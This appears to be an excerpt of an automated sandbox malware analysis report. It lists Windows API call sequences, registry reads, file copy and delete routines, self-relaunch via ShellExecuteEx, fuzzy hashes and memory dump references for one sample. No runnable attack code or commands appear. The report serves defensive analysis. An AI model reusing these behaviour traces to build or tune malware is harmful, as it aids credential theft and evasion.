                                              • Instruction Fuzzy Hash: CD01F4B9A40308BFEB10DFE4DC49FAEB7B9EB48705F104559FA05A7280D67565008F52
                                              APIs
                                              • StrStrA.SHLWAPI(02BE9568,?,?,?,0041140C,?,02BE9568,00000000), ref: 0041926C
                                              • lstrcpyn.KERNEL32(0064AB88,02BE9568,02BE9568,?,0041140C,?,02BE9568), ref: 00419290
                                              • lstrlenA.KERNEL32(?,?,0041140C,?,02BE9568), ref: 004192A7
                                              • wsprintfA.USER32 ref: 004192C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpynlstrlenwsprintf
                                              • String ID: %s%s
                                              • API String ID: 1206339513-3252725368
                                              • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                              • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                              • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                              • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                              • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                              • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3466090806-0
                                              • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                              • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                              • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                              • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 047E151B
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047E1522
                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 047E153E
                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 047E155C
                                              • RegCloseKey.ADVAPI32(?), ref: 047E1566
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3225020163-0
                                              • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                              • Instruction ID: e81fb83dcd46173a13a6f34982c012695e5b9f3f1f40520a56732df8b0b3d422
                                              • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                              • Instruction Fuzzy Hash: 900131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D674AA018F91
                                              APIs
                                              • __getptd.LIBCMT ref: 0041C74E
                                                • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                              • __getptd.LIBCMT ref: 0041C765
                                              • __amsg_exit.LIBCMT ref: 0041C773
                                              • __lock.LIBCMT ref: 0041C783
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                              • String ID:
                                              • API String ID: 938513278-0
                                              • Opcode ID: 355d926354504f605bf63a083571741bbcfc67458f74eb70e54842a85c90e286
                                              • Instruction ID: f221cbc75ab16e387751c9b116ef15a62a105912f32ca5c84f33c5bc9026f8a6
                                              • Opcode Fuzzy Hash: 355d926354504f605bf63a083571741bbcfc67458f74eb70e54842a85c90e286
                                              • Instruction Fuzzy Hash: 72F09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                                              APIs
                                              • __getptd.LIBCMT ref: 047FC9B5
                                                • Part of subcall function 047FC206: __getptd_noexit.LIBCMT ref: 047FC209
                                                • Part of subcall function 047FC206: __amsg_exit.LIBCMT ref: 047FC216
                                              • __getptd.LIBCMT ref: 047FC9CC
                                              • __amsg_exit.LIBCMT ref: 047FC9DA
                                              • __lock.LIBCMT ref: 047FC9EA
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 047FC9FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                              • String ID:
                                              • API String ID: 938513278-0
                                              • Opcode ID: 0dee89ca1e27279cee20c61cf39372be64ae68290e804cf05a8e7f65ce69890f
                                              • Instruction ID: f56e4a94ed7582ccfa9b3dd366da2c9b0602276465a30069682d660893478c05
                                              • Opcode Fuzzy Hash: 0dee89ca1e27279cee20c61cf39372be64ae68290e804cf05a8e7f65ce69890f
                                              • Instruction Fuzzy Hash: FFF09032A447189FF722FFE89D0A71D33A0BF00728F10010AD614A67D0DB257540DBAA
                                              APIs
                                              • StrCmpCA.SHLWAPI(00000000,02BE5CE0), ref: 0041079A
                                              • StrCmpCA.SHLWAPI(00000000,02BE5E40), ref: 00410866
                                              • StrCmpCA.SHLWAPI(00000000,02BE5E10), ref: 0041099D
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy
                                              • String ID: `_A
                                              • API String ID: 3722407311-2339250863
                                              • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                              • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                              • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                              • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                              APIs
                                              • StrCmpCA.SHLWAPI(00000000,02BE5CE0), ref: 0041079A
                                              • StrCmpCA.SHLWAPI(00000000,02BE5E40), ref: 00410866
                                              • StrCmpCA.SHLWAPI(00000000,02BE5E10), ref: 0041099D
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy
                                              • String ID: `_A
                                              • API String ID: 3722407311-2339250863
                                              • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                              • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                              • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                              • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                              • ExitProcess.KERNEL32 ref: 00416755
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                              • String ID: <
                                              • API String ID: 1148417306-4251816714
                                              • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                              • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                              • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                              • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 047F68CA
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 047F698D
                                              • ExitProcess.KERNEL32 ref: 047F69BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                              • String ID: <
                                              • API String ID: 1148417306-4251816714
                                              • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                              • Instruction ID: f53ce7491ba58a79f2933ac07b729aee33686db3c6d992f4872bf8369408eb32
                                              • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                              • Instruction Fuzzy Hash: D3316BB5901208ABEB14EF90DD98FDEB778AF44304F404199E309A6390EF746B88CF59
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: @Jn@$Jn@$Jn@
                                              • API String ID: 544645111-1180188686
                                              • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                              • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                              • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                              • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                              APIs
                                              • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcatlstrcpy
                                              • String ID: vI@$vI@
                                              • API String ID: 3905823039-1245421781
                                              • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                              • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                              • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                              • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                              • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                              • wsprintfW.USER32 ref: 00418D78
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocProcesswsprintf
                                              • String ID: %hs
                                              • API String ID: 659108358-2783943728
                                              • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                              • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                              • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                              • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02BB4BE0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                              • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                              • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                              • String ID:
                                              • API String ID: 257331557-0
                                              • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                              • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                              • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                              • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,047E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FAC,00420E17), ref: 047F8DED
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 047EA548
                                              • lstrlen.KERNEL32(00000000,00000000), ref: 047EA666
                                              • lstrlen.KERNEL32(00000000), ref: 047EA923
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 047EA094
                                              • DeleteFileA.KERNEL32(00000000), ref: 047EA9AA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                              • String ID:
                                              • API String ID: 257331557-0
                                              • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                              • Instruction ID: 126107cd91f560266624859d69ff7940788c3db0a6c3007e13fce72039511a85
                                              • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                              • Instruction Fuzzy Hash: 29E1F3729102189BDB19FBA4DD98DEE7339AF54208F508169E25A72390EF347B4CCF61
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02BB4BE0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                              • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                              • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                              • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                              • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                              • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,047E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FAC,00420E17), ref: 047F8DED
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 047ED6E8
                                              • lstrlen.KERNEL32(00000000), ref: 047ED8FF
                                              • lstrlen.KERNEL32(00000000), ref: 047ED913
                                              • DeleteFileA.KERNEL32(00000000), ref: 047ED992
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
